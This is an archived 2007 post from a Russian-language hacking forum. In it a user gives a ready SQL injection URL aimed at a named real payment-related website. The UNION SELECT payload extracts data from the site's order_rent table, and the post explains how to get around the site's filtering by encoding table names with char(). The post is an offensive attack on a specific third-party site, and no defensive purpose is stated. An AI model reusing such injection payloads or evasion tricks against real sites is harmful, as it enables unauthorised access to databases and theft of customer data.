ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
17.11.2007, 03:06
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
З.Ы. Блин забыл - интересна табличка order_rent , я не вкурил кем она заполняеться но судя по названия (order - приказывать, но можно здесь перевести и как заказ) это табличка заказов. Это походу единственное что заслуживает внимания - http://unactpay.ru/index.php?page=news&cur=1&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,name,12,13+FRO M+order_rent/* например так.
Кодеры - явно барыги и добавили какую то кривую защиту. Т.е. для подбора имен полей пользоваться банальным WHERE+TABLE_NAME='vasya_pupkin' нельзя, нужно воспользоваться функцией char(), т.е. например WHERE+TABLE_NAME='vasya_pupkin' прерращаеться в WHERE+TABLE_NAME=char(118,97,115,121,97,95,112,117 ,112,107,105,110)
Последний раз редактировалось А®ТеS; 17.11.2007 в 03:33..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид